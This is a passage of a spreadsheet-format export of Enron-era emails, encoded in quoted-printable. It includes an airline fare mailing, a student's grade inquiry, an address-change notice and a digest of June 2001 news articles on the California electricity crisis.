 landing September 11th Security Fee: A $2.50 per flight segment September =_x000D_
11th Security Fee (up to a maximum of $10 per roundtrip) will be applied Pa=_x000D_
ssenger Facility Charges: Up to $20 per person, depending on itinerary Fede=_x000D_
ral International Taxes: To/from Canada: $12.40 or 7.5% US intl tax charged=_x000D_
 on arrival and departure from US (based on itinerary) and $6 US immigratio=_x000D_
n fee. Canada only: NAVCAN surcharge of CAD7.50 each way           You have=_x000D_
 received this message because you subscribed to the  Surf'n Go messaging s=_x000D_
ervice at americawest.com.  To unsubscribe to this weekly mailing, please v=_x000D_
isit http://www.americawest.com/specials/sp_subscribe.asp .   This e-mail w=_x000D_
as sent to: sscott5@enron.com  =09_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 04:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ueng@stthom.edu'})</t>
  </si>
  <si>
    <t>Professor Ueng:_x000D_
Hope all is going well and you have either finished or are almost finished _x000D_
your Phd.  I was wondering if I could be able to find out my grade for the _x000D_
Financial Mgmt. class (MBA-5318 A) I took with you this summer.  Is there a _x000D_
website we can go to or something?  Thanks!_x000D_
Ben Rogers</t>
  </si>
  <si>
    <t>Thu, 23 Mar 2000 23:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>@ect.enron.com email notification!</t>
  </si>
  <si>
    <t xml:space="preserve">I guess my new address is chris.germany@enron.com_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 03/24/2000 07:29 _x000D_
AM ---------------------------_x000D_
From: ECT Notes Admin on 03/24/2000 01:07 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: @ect.enron.com email notification!_x000D_
_x000D_
We are one @enron.com!_x000D_
_x000D_
Please be aware of the following senders were automatically notified to (a). _x000D_
stop sending internet mail to your @ect.enron.com address and to (b). send _x000D_
future internet communications to Chris.Germany@enron.com :_x000D_
_x000D_
mgermany@CH2M.com, insider@previewtravel1.m0.net_x000D_
_x000D_
REMINDER :_x000D_
Your @ect.enron.com address should not be used any longer and will be _x000D_
deactivated soon.  So please make sure these contacts switch to your new _x000D_
@enron.com address.  If you have subscribed to mailing lists, please make _x000D_
sure to update your addresses there as well._x000D_
AND_x000D_
Your shortname@enron.com address (i.e. jsmith@enron.com) will continue to _x000D_
work, even though your formal address is longname@enron.com (i.e. _x000D_
john.smith@enron.com)_x000D_
_x000D_
Please do not reply to this message as it was automatically generated._x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 02:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Please see the following articles:_x000D_
_x000D_
Sac Bee, Tues, 6/5:  Ose electricity bill buffeted by political storms_x000D_
_x000D_
Sac Bee, Tues, 6/5: Bush vs. price caps: Economists correct a faulty power=_x000D_
=20_x000D_
lecture (Editorial)_x000D_
_x000D_
SD Union, Tues, 6/5: A game of victims and villains_x000D_
_x000D_
SD Union, Tues, 6/5: Idled plants coming back on line_x000D_
_x000D_
SD Union, Mon, 6/4: Planned plant shutdowns easing, boosting state's power=_x000D_
=20_x000D_
supply_x000D_
_x000D_
SF Chron, Tues, 6/5: Chevron threatens to cut gas supply in state=20_x000D_
_x000D_
SF Chron, Tues, 6/5: PG&amp;E creditors approve bonuses=20_x000D_
Utility must file reorganization plan by end of year, or CEO only gets=20_x000D_
$600,000 extra_x000D_
_x000D_
SF Chron, Tues, 6/5: 56% favor limits on electricity prices, poll finds_x000D_
_x000D_
SF Chron, Tues, 6/5: Developments in California's energy crisis_x000D_
_x000D_
SF Chron, Tues, 6/5: PG&amp;E sues to challenge reimbursement to state_x000D_
_x000D_
Mercury News, Tues, 6/5: Critics say Calpine plan too generous =20_x000D_
_x000D_
Mercury News, Mon, 6/4:  PBS documentary shines light on energy crisis =20_x000D_
(Enron mentioned)_x000D_
_x000D_
Mercury News, Tues, 6/5: California's big turnoff  (Editorial)_x000D_
_x000D_
Mercury News, Tues, 6/5: FERC shirk  (Editorial)_x000D_
_x000D_
OC Register, Tues, 6/5: Edison plugging shareholders into Capitol_x000D_
_x000D_
OC Register, Tues, 6/5:  SDG&amp;E to seek rate hike to cover $915 million tab_x000D_
_x000D_
OC Regiser, Tues, 6/5:  Energy notebook_x000D_
AES power plant repairs might not meet target date_x000D_
_x000D_
Individual.com (Businesswire), Tues, 6/5:  GWF Signs Long-Term Contract to=_x000D_
=20_x000D_
Provide 430 MW_x000D_
of Power to California=20_x000D_
_x000D_
WSJ, Tues, 6/5:  Electricity prices (Chart)_x000D_
_x000D_
NY Times, Tues, 6/5:  Surplus of Finger-Pointing In California Energy Crisi=_x000D_
s_x000D_
_x000D_
LA Times, Tues, 6/5:  California PSEG Signs 10-Year Contract to Supply=20_x000D_
Electricity to State_x000D_
_x000D_
LA Times, Tues, 6/5:  Panel OKs Subpoenas for Energy Companies Electricity =_x000D_
:=20_x000D_
Special state Senate committee will demand pricing information in inquiry=_x000D_
=20_x000D_
into whether_x000D_
California has been gouged_x000D_
_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
-----------------------------------_x000D_
 Ose electricity bill buffeted by political storms=20_x000D_
By David Whitney_x000D_
Bee Washington Bureau_x000D_
(Published June 5, 2001)=20_x000D_
WASHINGTON -- Rep. Doug Ose's legislation to bring order to skyrocketing=20_x000D_
wholesale electricity prices is helping House Republicans rescue an emergen=_x000D_
cy=20_x000D_
electricity bill, but it hasn't quelled Democrats' increasingly strident ca=_x000D_
ll=20_x000D_
for more extensive price controls.=20_x000D_
Utility sources, meanwhile, said the Sacramento Republican's legislation=20_x000D_
won't do enough to stop the rapid escalation in wholesale power rates in=20_x000D_
California and the West Coast.=20_x000D_
And Mark Cooper, director of research for the Consumer Federation of Americ=_x000D_
a,=20_x000D_
charged that the bill would lead to even higher power rates for most=20_x000D_
Californians. "Ose's bill simply legalizes the transfer of billions of=20_x000D_
dollars from California to Texas and Oklahoma," Cooper said.=20_x000D_
Ose, chairman of the House Government Reform Committee's energy policy pane=_x000D_
l,=20_x000D_
introduced his bill last month. The measure was promptly referred to the=20_x000D_
House Energy and Commerce Committee, whose Republican leaders saw it as a w=_x000D_
ay=20_x000D_
out of a politically sticky mess.=20_x000D_
With Democrats demanding that federal regulators set wholesale rates based =_x000D_
on=20_x000D_
generators' actual cost of producing power and the Bush administration=20_x000D_
opposing anything that looks like price caps, Ose's idea contained the seed=_x000D_
s=20_x000D_
of compromise.=20_x000D_
Ose expanded on what the Federal Energy Regulatory Commission already had=_x000D_
=20_x000D_
endorsed in a controversial "price mitigation" order for the California=20_x000D_
market that took effect last week.=20_x000D_
That order states that during a power emergency, the wholesale price on the=_x000D_
=20_x000D_
spot market will be pegged to the cost of production at the highest-cost,=_x000D_
=20_x000D_
least-efficient plant selling into the market at the time.=20_x000D_
Ose's bill defuses some of the Democratic criticism of that action by makin=_x000D_
g=20_x000D_
the order apply at all times and throughout the 13-state Western region.=20_x000D_
"It is not a cap," Ose said. "It is market driven. It rewards those who are=_x000D_
=20_x000D_
most efficient, and it rewards those who are most environmentally sensitive=_x000D_
=20_x000D_
and responsible."=20_x000D_
House Energy and Commerce Committee leaders hope to use the bill this week =_x000D_
as=20_x000D_
the framework to jump-start a package of emergency electricity provisions,=_x000D_
=20_x000D_
including authorization of a $200 million fix of a critical Central=20_x000D_
California transmission line bottleneck.=20_x000D_
California Democrats, heartened by the leadership change in the Senate that=_x000D_
=20_x000D_
strengthens Sen. Dianne Feinstein's hand on her price-control legislation,=_x000D_
=20_x000D_
are working to derail the Ose compromise.=20_x000D_
"By allowing the least-efficient generator to set the price, this proposal=_x000D_
=20_x000D_
creates a system that will encourage massive market manipulation, raising=_x000D_
=20_x000D_
prices even further," they said in a statement. "This amendment will do=20_x000D_
nothing to help stop the economic bleeding."=20_x000D_
_x000D_
The Bee's David Whitney can be reached at (202) 383-0004 or=20_x000D_
dwhitney@mcclatchydc.com._x000D_
_x000D_
_x000D_
Bush vs. price caps: Economists correct a faulty power lecture_x000D_
_x000D_
_x000D_
(Published June 5, 2001)=20_x000D_
_x000D_
In his recent commencement address at Yale University, President Bush salut=_x000D_
ed=20_x000D_
the C students in the graduating class: "I say you, too, can be president o=_x000D_
f=20_x000D_
the United States." But when he lectured California last week on the evils =_x000D_
of=20_x000D_
electricity price controls, the joke seemed less funny. What America's most=_x000D_
=20_x000D_
famous C student didn't learn in economics class is costing the state dearl=_x000D_
y.=20_x000D_
"Price caps do nothing to reduce demand, and they do nothing to increase=20_x000D_
supply," Bush said in his Los Angeles address, repeating a standard lesson=_x000D_
=20_x000D_
out of introductory economics textbooks. Unfortunately, as 10 energy=20_x000D_
economists from universities around the nation made clear last week in an=_x000D_
=20_x000D_
open letter on the state's electricity crisis, Bush must have missed the=20_x000D_
later chapters.=20_x000D_
The textbooks' admonitions against price controls apply to competitive=20_x000D_
markets. When competition breaks down, giving one or a few producers the=20_x000D_
ability to control prices, the textbooks are equally firm that regulation i=_x000D_
s=20_x000D_
needed to keep them from exploiting consumers.=20_x000D_
That's the situation confronting California -- and federal regulators.=20_x000D_
Electricity markets here long ago ceased to be competitive. Because of a=20_x000D_
flawed market structure and a temporary imbalance between supply and demand=_x000D_
,=20_x000D_
generators learned last year that they had market power: By withholding=20_x000D_
supply at key times and places, they drove up the price of power beyond the=_x000D_
=20_x000D_
level that would otherwise prevail in a competitive market.=20_x000D_
"We cannot expect a market to operate to benefit consumers ... if effective=_x000D_
=20_x000D_
competition does not exist," the economists said in their letter. "In this=_x000D_
=20_x000D_
case, cost-of-service prices are an obvious remedy."=20_x000D_
They noted that several useful proposals have been submitted to the Federal=_x000D_
=20_x000D_
Energy Regulatory Commission (FERC) for temporary price restraints on=20_x000D_
wholesale prices. These would last only until new plants now being built co=_x000D_
me=20_x000D_
online to alleviate the shortage.=20_x000D_
Such restraints could meet the federal legal requirement that prices be "ju=_x000D_
st=20_x000D_
and reasonable" without discouraging construction of new power plants or=20_x000D_
generation from existing plants, which is needed to keep the lights on this=_x000D_
=20_x000D_
summer. In fact, as some economists have pointed out, the right kind of pri=_x000D_
ce=20_x000D_
controls could actually increase supply by removing any incentive for=20_x000D_
generators to withhold electricity to game the market.=20_x000D_
Bush's regulatory inaction is producing an unprecedented transfer of wealth=_x000D_
=20_x000D_
from California households and businesses to the generating firms, a shift=_x000D_
=20_x000D_
that endangers the health of the state's economy. Unless FERC or Congress=_x000D_
=20_x000D_
steps in, that wealth transfer likely will yield a political backlash not=_x000D_
=20_x000D_
only against electricity deregulation, but also against market-based polici=_x000D_
es=20_x000D_
in general. Even a C student should know enough history to understand that'=_x000D_
s=20_x000D_
not a risk an incumbent politician wants to court._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
A game of victims and villains=20_x000D_
_x000D_
_x000D_
_x000D_
Stereotypes cloud the complexity of energy issue_x000D_
By Dana Wilkie=20_x000D_
COPLEY NEWS SERVICE=20_x000D_
June 5, 2001=20_x000D_
WASHINGTON -- When Gov. Gray Davis refers to those Texans taking California=_x000D_
ns=20_x000D_
to the cleaners with electricity prices, the impression he apparently wants=_x000D_
=20_x000D_
to leave is one of greedy and unscrupulous Republicans who probably look li=_x000D_
ke=20_x000D_
oil baron J.R. Ewing.=20_x000D_
And when Bush administration officials sniff that Californians got themselv=_x000D_
es=20_x000D_
into this energy mess, they seem to be conjuring up the image of=20_x000D_
short-sighted, tree-hugging Democrats who care more about Alaskan caribou=_x000D_
=20_x000D_
than about people.=20_x000D_
Even if Davis and Bush shook hands and appeared civil in California last=20_x000D_
Tuesday, the previous weeks of discord between the two left an indelible=20_x000D_
impression on the public, experts said -- one colored by stereotypes that=_x000D_
=20_x000D_
easily strike a chord with voters but that also cloud the complexity of the=_x000D_
=20_x000D_
energy issue.=20_x000D_
Those stereotypes pit the languid, Birkenstock-wearing Californian against=_x000D_
=20_x000D_
the respectable Texas corporate man; the gluttonous executive against the=_x000D_
=20_x000D_
rabid environmentalist; John Wayne against out-of-towners in black hats. Ju=_x000D_
st=20_x000D_
as when many in this country maligned Arabs during the 1970s oil embargo,=_x000D_
=20_x000D_
attempts to create victims and villains in the current energy crisis easily=_x000D_
=20_x000D_
appeal to public emotion.=20_x000D_
Davis, a Democrat, recently invoked the image of hand-to-hand combat with a=_x000D_
=20_x000D_
fearsome foreigner: "We are literally in a war with energy companies, many =_x000D_
of=20_x000D_
which reside in Texas," Davis said after Bush, a Texan, released his energy=_x000D_
=20_x000D_
plan.=20_x000D_
The image is straight from an old western.=20_x000D_
"Gray Davis is playing John Wayne against the guy with the black hat," said=_x000D_
=20_x000D_
Mark Petracca, chairman of the political science department at the Universi=_x000D_
ty=20_x000D_
of California Irvine. "You sound like a socialist if you demonize middle-ag=_x000D_
ed=20_x000D_
white guys in suits who own capital. You sound like a cowboy with a white h=_x000D_
at=20_x000D_
when you demonize oil barons."=20_x000D_
U.S. Sen. Barbara Boxer, another Democrat, plopped a black hat on Vice=20_x000D_
President Dick Cheney, architect of Bush's energy plan: "You have the vice=_x000D_
=20_x000D_
president sounding like an oil man."=20_x000D_
Said Petracca: "Of all the possible images that one could pick, the oil bar=_x000D_
on=20_x000D_
is the easiest to manufacture. It has the deepest cultural resonance, becau=_x000D_
se=20_x000D_
people have been exposed to this imagery on TV stations for years and years=_x000D_
."=20_x000D_
Helping to bolster that image, of course, is the fact that both Bush and=20_x000D_
Cheney worked in companies involved with oil.=20_x000D_
While Bush professes no part in the blame game -- "He's not interested in=_x000D_
=20_x000D_
finger-pointing," said White House press secretary Ari Fleischer -- Cheney=_x000D_
=20_x000D_
raised the stereotype of the superficial, mollycoddled, air-headed=20_x000D_
Californian. On a national news program, he called California's electricity=_x000D_
=20_x000D_
deregulation scheme "harebrained" and Davis' suggestion that Bush allowed=_x000D_
=20_x000D_
price-gouging "goofy."=20_x000D_
"You have a war of two biases," said Jack Pitney, a government professor at=_x000D_
=20_x000D_
Claremont McKenna College. "The bias of Texas as greedy and money-grubbing,=_x000D_
=20_x000D_
and the bias of California as shallow and narcissistic."=20_x000D_
No matter how unrepresentative, these stereotypes are a way for the Davis a=_x000D_
nd=20_x000D_
Bush administrations, and the national political parties, to convince voter=_x000D_
s=20_x000D_
whom to blame for the energy mess. That one of the parties should be a=20_x000D_
"culprit" is itself somewhat disingenuous, since the crisis has roots that=_x000D_
=20_x000D_
run across Republican and Democratic administrations.=20_x000D_
Davis' once-stellar public approval ratings have withered, as Californians=_x000D_
=20_x000D_
increasingly disapprove of how he has handled the crisis. Facing re-=20_x000D_
election next year and a considered a presidential prospect in 2004, the=20_x000D_
governor often reminds Californians that the crisis grew out of a Republica=_x000D_
n=20_x000D_
deregulation scheme, and that he is working around the clock to build new=_x000D_
=20_x000D_
power plants.=20_x000D_
California Attorney General Bill Lockyer, also a Democrat, recently portray=_x000D_
ed=20_x000D_
power-company executives as criminals: "I would love to personally escort=_x000D_
=20_x000D_
(Enron Corp. Chairman Kenneth) Lay to an 8-by-10 cell that he could share=_x000D_
=20_x000D_
with a tattooed dude who says, 'Hi, my name is Spike, honey,'=20_x000D_
" Lockyer said.=20_x000D_
Meanwhile, national Democrats have aired a TV ad in the Long Beach district=_x000D_
=20_x000D_
of GOP Rep. Stephen Horn that says the congressman teamed with Bush to oppo=_x000D_
se=20_x000D_
price caps that might have offered relief from summer blackouts.=20_x000D_
"It's a short-term effort by Davis to blame (others) for his difficulties,=_x000D_
=20_x000D_
but it's also part of a longer-term national Democratic Party effort to mak=_x000D_
e=20_x000D_
a case that the administration is rather friendly to the big-energy=20_x000D_
interests, and less friendly to conservationists," said Bruce Buchanan, a=_x000D_
=20_x000D_
University of Texas expert on the presidency.=20_x000D_
If gasoline prices stay high, or if California's electricity problems spill=_x000D_
=20_x000D_
over into other states, it may be Bush -- and Republicans running in next=_x000D_
=20_x000D_
year's elections -- who land in trouble with the public. The GOP fears that=_x000D_
=20_x000D_
voters may perceive Republicans as the monopolistic and environmentally=20_x000D_
unfriendly tools of oil companies.=20_x000D_
In the 1970s, politicians found an easy culprit for long lines at gas=20_x000D_
stations and high fuel prices: They preyed on stereotypes of Arabs.=20_x000D_
"All you had to do was show a bunch of Arab sheiks -- who already look to u=_x000D_
s=20_x000D_
sort of exotic -- meeting in some country that makes people think of=20_x000D_
international terrorism," said UC Irvine's Petracca. "Bingo -- you have som=_x000D_
e=20_x000D_
people to blame."=20_x000D_
Now, as then, the images have little to do with reality.=20_x000D_
Ben Paulos, who promotes alternative power with the Energy Foundation, said=_x000D_
=20_x000D_
"it's a simplification" to paint the culprits in California's energy crisis=_x000D_
=20_x000D_
as Texas oil companies.=20_x000D_
"These are international companies that own things all over the place," he=_x000D_
=20_x000D_
said.=20_x000D_
In fact, most of the privately owned power generators in California are own=_x000D_
ed=20_x000D_
by companies that are not from Texas.=20_x000D_
And while conservationists get mileage out of associating these companies=_x000D_
=20_x000D_
with J.R. Ewing -- the Larry Hagman character who ran an oil company on TV'=_x000D_
s=20_x000D_
"Dallas" -- "these (Texas) companies we're talking about are not oil=20_x000D_
companies," Petracca said. "They're energy companies, natural gas companies=_x000D_
.=20_x000D_
But people lump it all together."=20_x000D_
Said Pitney: "When you're trying to get on (with news anchor) Dan Rather,=_x000D_
=20_x000D_
detailed matters about energy policy just don't make the cut."=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Idled plants coming back on line=20_x000D_
_x000D_
_x000D_
_x000D_
By Don Thompson=20_x000D_
ASSOCIATED PRESS=20_x000D_
June 5, 2001=20_x000D_
SACRAMENTO -- California's electricity production should improve in the nex=_x000D_
t=20_x000D_
few weeks weeks as more power plants come back on line after spring=20_x000D_
maintenance shutdowns, the state's grid operator said yesterday.=20_x000D_
That, coupled with conservation efforts detailed by state officials Sunday,=_x000D_
=20_x000D_
could help during this summer's high temperatures, independent observers sa=_x000D_
id=20_x000D_
-- but not enough to stave off blackouts.=20_x000D_
"We still find blackouts are inevitable," said Michael Zenker of Cambridge=_x000D_
=20_x000D_
Energy Research Associates, an energy research and consulting organization.=_x000D_
=20_x000D_
"There just isn't enough generation available."=20_x000D_
_x000D_
By the middle of this month, every existing plant is scheduled to be=20_x000D_
producing power. That contrasts with a historic high this spring when about=_x000D_
 a=20_x000D_
third of the state's power generation was unavailable due to scheduled or=_x000D_
=20_x000D_
emergency shutdowns.=20_x000D_
The high number of shuttered plants prompted state officials to suggest pow=_x000D_
er=20_x000D_
generators were deliberately withholding electricity to drive up prices, an=_x000D_
d=20_x000D_
Gov. Gray Davis ordered inspectors into plants to make sure generators=20_x000D_
weren't cheating.=20_x000D_
Generators objected, saying they have run their plants so hard since last=_x000D_
=20_x000D_
year that routine maintenance was overdue, which caused more unplanned=20_x000D_
breakdowns.=20_x000D_
The Independent System Operator, which runs the power grid, says equipment=_x000D_
=20_x000D_
breakdowns typically account for about 2,500 megawatts being off-line on an=_x000D_
y=20_x000D_
given day. Forced outages stripped the power grid of 2,673 megawatts=20_x000D_
yesterday.=20_x000D_
The power grid was short 4,144 megawatts due to planned shutdowns yesterday=_x000D_
,=20_x000D_
beating the Independent System Operator's projections that 5,800 megawatts=_x000D_
=20_x000D_
would be unavailable. That was down from 9,800 megawatts off-line for=20_x000D_
scheduled maintenance when the state narrowly avoided rolling blackouts=20_x000D_
Thursday.=20_x000D_
The ISO projects that in a week, about 3,000 megawatts should be down for=_x000D_
=20_x000D_
maintenance, said ISO spokeswoman Stephanie McCorkle. "It looks like we're =_x000D_
on=20_x000D_
target with our goal of getting the planned maintenance down to zero by=20_x000D_
mid-June."=20_x000D_
More generation, however, "doesn't mean consumers can cut back on their=20_x000D_
conservation, because at the same time more plants come on line, temperatur=_x000D_
es=20_x000D_
continue to rise," McCorkle said. By summer's peak in August and September,=_x000D_
=20_x000D_
California can be using more than 45,000 megawatts.=20_x000D_
Californians cut their electricity use by 11 percent overall, and by about =_x000D_
10=20_x000D_
percent during peak demand hours last month compared to the same month last=_x000D_
=20_x000D_
year, the California Energy Commission said Sunday. In addition, the Davis=_x000D_
=20_x000D_
administration has signed more power contracts, and the price of that power=_x000D_
=20_x000D_
is falling.=20_x000D_
"All that's good news. We're moving in the right direction," said Severin=_x000D_
=20_x000D_
Borenstein, director of the University of California Berkeley's energy=20_x000D_
institute. However, "the amount of conservation we're going to need in the=_x000D_
=20_x000D_
late summer is even greater than we have now. We've got a long stretch ahea=_x000D_
d=20_x000D_
of us."=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Planned plant shutdowns easing, boosting state's power supply=20_x000D_
_x000D_
_x000D_
_x000D_
By Don Thompson_x000D_
ASSOCIATED PRESS=20_x000D_
June 4, 2001=20_x000D_
SACRAMENTO =01) California's electricity production should improve in the c=_x000D_
oming=20_x000D_
weeks as more power plants come back on line after spring maintenance=20_x000D_
shutdowns, the state's grid operator said Monday.=20_x000D_
That, coupled with conservation efforts detailed by state officials Sunday,=_x000D_
=20_x000D_
could help during this summer's high temperatures, independent observers sa=_x000D_
id=20_x000D_
=01) but not enough to stave off blackouts.=20_x000D_
"We still find blackouts are inevitable," said Michael Zenker of Cambridge=_x000D_
=20_x000D_
Energy Research Associates, an energy research and consulting organization.=_x000D_
=20_x000D_
"There just isn't enough generation available."=20_x000D_
By mid-June, every existing plant is scheduled to be producing power. That=_x000D_
=20_x000D_
contrasts with a historic high this spring when about a third of the state'=_x000D_
s=20_x000D_
power generation was unavailable due to scheduled or emergency shutdowns.=_x000D_
=20_x000D_
The high number of shuttered plants prompted state officials to suggest pow=_x000D_
er=20_x000D_
generators were deliberately withholding electricity to drive up prices, an=_x000D_
d=20_x000D_
Gov. Gray Davis to order inspectors into plants to make sure generators=20_x000D_
weren't cheating.=20_x000D_
Generators objected, saying they have run their plants so hard since last=_x000D_
=20_x000D_
year that routine maintenance was overdue, which caused more unplanned=20_x000D_
breakdowns.=20_x000D_
Last Thursday, for instance, when California came within a hair of a sevent=_x000D_
h=20_x000D_
day of statewide blackouts, one of Duke Energy's 750-megawatt Moss Landing=_x000D_
=20_x000D_
units began springing boiler leaks.=20_x000D_
"We almost lost it that day because we'd been putting off scheduled=20_x000D_
maintenance for so long," said company spokesman Tom Williams. "You can nur=_x000D_
se=20_x000D_
those along for a while, but after a while they'll trip (off-line) and=20_x000D_
they'll do it during the peak of the summer."=20_x000D_
The Independent System Operator, which runs the power grid, says equipment=_x000D_
=20_x000D_
breakdowns typically account for about 2,500 megawatts being off-line on an=_x000D_
y=20_x000D_
given day. Forced outages stripped the power grid of 2,673 megawatts Monday=_x000D_
.=20_x000D_
The power grid was short 4,144 megawatts due to planned shutdowns Monday,=_x000D_
=20_x000D_
beating the Independent System Operator's projections that 5,800 megawatts=_x000D_
=20_x000D_
would be unavailable. That was down from 9,800 megawatts off-line for=20_x000D_
scheduled maintenance when the state narrowly avoided rolling blackouts=20_x000D_
Thursday.=20_x000D_
By comparison, California was expected to use about 31,000 megawatts of pow=_x000D_
er=20_x000D_
during its afternoon peak period Monday, and top out at about 31,800=20_x000D_
megawatts Tuesday afternoon. The 4,144 megawatts unavailable due to planned=_x000D_
=20_x000D_
shutdowns Monday would have powered about 3.1 million homes.=20_x000D_
The ISO projects that in a week, about 3,000 megawatts should be down for=_x000D_
=20_x000D_
maintenance, said ISO spokeswoman Stephanie McCorkle. "It looks like we're =_x000D_
on=20_x000D_
target with our goal of getting the planned maintenance down to zero by=20_x000D_
mid-June."=20_x000D_
More generation, however, "doesn't mean consumers can cut back on their=20_x000D_
conservation, because at the same time more plants come on line, temperatur=_x000D_
es=20_x000D_
continue to rise," McCorkle said. By summer's peak in August and September,=_x000D_
=20_x000D_
California can be using more than 45,000 megawatts.=20_x000D_
Californians cut their electricity use by 11 percent overall, and by about =_x000D_
10=20_x000D_
percent during peak demand hours last month compared to the same month last=_x000D_
=20_x000D_
year, the California Energy Commission said Sunday. In addition, the Davis=_x000D_
=20_x000D_
administration said has signed more power contracts, and the price of that=_x000D_
=20_x000D_
power is falling.=20_x000D_
"All that's good news. We're moving in the right direction," said Severin=_x000D_
=20_x000D_
Borenstein, director of the University of California, Berkeley's energy=20_x000D_
institute. However, "the amount of conservation we're going to need in the=_x000D_
=20_x000D_
late summer is even greater than we have now. We've got a long stretch ahea=_x000D_
d=20_x000D_
of us."=20_x000D_
Planned maintenance shutdowns this winter and spring helped prompt six days=_x000D_
=20_x000D_
of rolling blackouts, said ISO spokesman Gregg Fishman. The ISO recently=20_x000D_
delayed installation of pollution control equipment at five plants until=20_x000D_
winter so those plants can operate through the hot summer months.=20_x000D_
"The idea is the plants go down mainly in the springtime, because usually=_x000D_
=20_x000D_
there's the hydro(electricity) there to replace them," Fishman said. But no=_x000D_
t=20_x000D_
with this year's water and snowfall shortage: "We got squeezed a couple of=_x000D_
=20_x000D_
times because of the hydro shortage either here (in California) or in the=_x000D_
=20_x000D_
Northwest."=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chevron threatens to cut gas supply in state=20_x000D_
Bernadette Tansey, Chronicle Staff Writer_x000D_
Tuesday, June 5, 2001=20_x000D_
,2001 San Francisco Chronicle=20_x000D_
URL: http://www.sfgate.com/cgi-bin/article.cgi?f=3D/c/a/2001/06/05/MN159275=_x000D_
.DTL=20_x000D_
Chevron Corp. will reduce gasoline production at its two California=20_x000D_
refineries unless they are exempted from rolling blackouts, the company's=_x000D_
=20_x000D_
chief executive warned Gov. Gray Davis.=20_x000D_
In a move that could raise California gas prices, Chevron's Richmond and El=_x000D_
=20_x000D_
Segundo plants will scale back output and rely solely on the power provided=_x000D_
=20_x000D_
by their own electrical generators, Chevron Chairman David O'Reilly said in=_x000D_
 a=20_x000D_
letter Friday obtained by The Chronicle.=20_x000D_
Chevron would not say how much less gas it would supply from its refineries=_x000D_
,=20_x000D_
which have a combined capacity of 485,000 barrels per day. But a spokesman=_x000D_
=20_x000D_
for the California Energy Commission said motorists could feel it at the=20_x000D_
pump.=20_x000D_
"Any reduction in production has an impact in the marketplace," said senior=_x000D_
=20_x000D_
fuel specialist Gordon Schremp. "Prices are going to go up."=20_x000D_
Chevron's gasoline sales account for more than 18 percent of the California=_x000D_
=20_x000D_
market, company spokesman Fred Gorell said.=20_x000D_
While other California refiners met yesterday's deadline to apply to state=_x000D_
=20_x000D_
regulators for exemptions from temporary outages, O'Reilly said Chevron wou=_x000D_
ld=20_x000D_
not submit an application.=20_x000D_
To qualify for one of the exemptions being considered by the state Public=_x000D_
=20_x000D_
Utilities Commission, Chevron would have had to assert that its vulnerabili=_x000D_
ty=20_x000D_
to blackouts would present "imminent danger to public health or safety" --=_x000D_
=20_x000D_
something O'Reilly said Chevron could not do.=20_x000D_
"Chevron will never operate its facilities in a manner that jeopardizes the=_x000D_
=20_x000D_
health or safety of its employees or its neighbors," O'Reilly wrote. Unless=_x000D_
=20_x000D_
the PUC or the Legislature shields Chevron from blackouts, it will rely on=_x000D_
=20_x000D_
its cogeneration plants.=20_x000D_
Chevron set no time line for cutting production, but Gorell said the compan=_x000D_
y=20_x000D_
is looking for state action "as soon as possible."=20_x000D_
Industry groups, backed by the California Energy Commission, have been=20_x000D_
pressing state officials to overturn a PUC decision that stripped refinerie=_x000D_
s=20_x000D_
of a former exemption from blackouts. Legislation that would create a blank=_x000D_
et=20_x000D_
exemption for refineries is stalled in the state Senate.=20_x000D_
Davis spokesman Steve Maviglio said the governor has not yet responded to=_x000D_
=20_x000D_
Chevron's letter and has not taken a position on the refinery exemption law=_x000D_
=20_x000D_
proposed by Assemblyman John Dutra, D-Fremont.=20_x000D_
Industry officials have warned that a refinery blacked out for just a few=_x000D_
=20_x000D_
hours could take as much as a week to bring back online.=20_x000D_
State regulators could not be reached for comment on Chevron's letter.=20_x000D_
Gorell said O'Reilly's letter should not be read as saying that conditions =_x000D_
at=20_x000D_
Chevron could be dangerous if the refineries suddenly lost power. At the=20_x000D_
Valero refinery in Benicia, however, spokesman Scott Folwarkow said his=20_x000D_
company did not hesitate to warn in its exemption application that sudden=_x000D_
=20_x000D_
shutdowns can pose a risk.=20_x000D_
He said refineries were designed under the assumption that they would have =_x000D_
a=20_x000D_
reliable supply of power. "If you start flipping the switch on and off,=20_x000D_
unpredictable things can happen," he said.=20_x000D_
E-mail Bernadette Tansey at btansey@sfchronicle.com.=20_x000D_
,2001 San Francisco Chronicle ? Page?A - 4=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PG&amp;E creditors approve bonuses=20_x000D_
Utility must file reorganization plan by end of year, or CEO only gets=20_x000D_
$600,000 extra David Lazarus, Chronicle Staff Writer_x000D_
Tuesday, June 5, 2001=20_x000D_
,2001 San Francisco Chronicle=20_x000D_
URL: http://www.sfgate.com/cgi-bin/article.cgi?f=3D/c/a/2001/06/05/MN159696=_x000D_
.DTL=20_x000D_
PG&amp;E's creditors have agreed to management's plan to shower top executives=_x000D_
=20_x000D_
with $17.5 million in bonuses but balked at the bankrupt utility's initial=_x000D_
=20_x000D_
demand that the cash come with no strings attached, The Chronicle has=20_x000D_
learned.=20_x000D_
Instead, the creditors say they forced Pacific Gas and Electric Co. to link=_x000D_
=20_x000D_
the bonuses -- in some cases doubling the pay of senior managers -- to=20_x000D_
quickly filing a Chapter 11 reorganization plan, no later than January.=20_x000D_
However, PG&amp;E spokesman Ron Low insisted yesterday that the utility had=20_x000D_
always intended for the bonuses to be tied to submitting a reorganization=_x000D_
=20_x000D_
plan.=20_x000D_
"Our original proposal closely resembled what was filed with the court," he=_x000D_
=20_x000D_
said.=20_x000D_
The bonuses are expected to figure prominently when PG&amp;E's management holds=_x000D_
 a=20_x000D_
court-mandated meeting with creditors on Thursday in San Francisco.=20_x000D_
Bankruptcy Judge Dennis Montali, who has the final say on all compensation=_x000D_
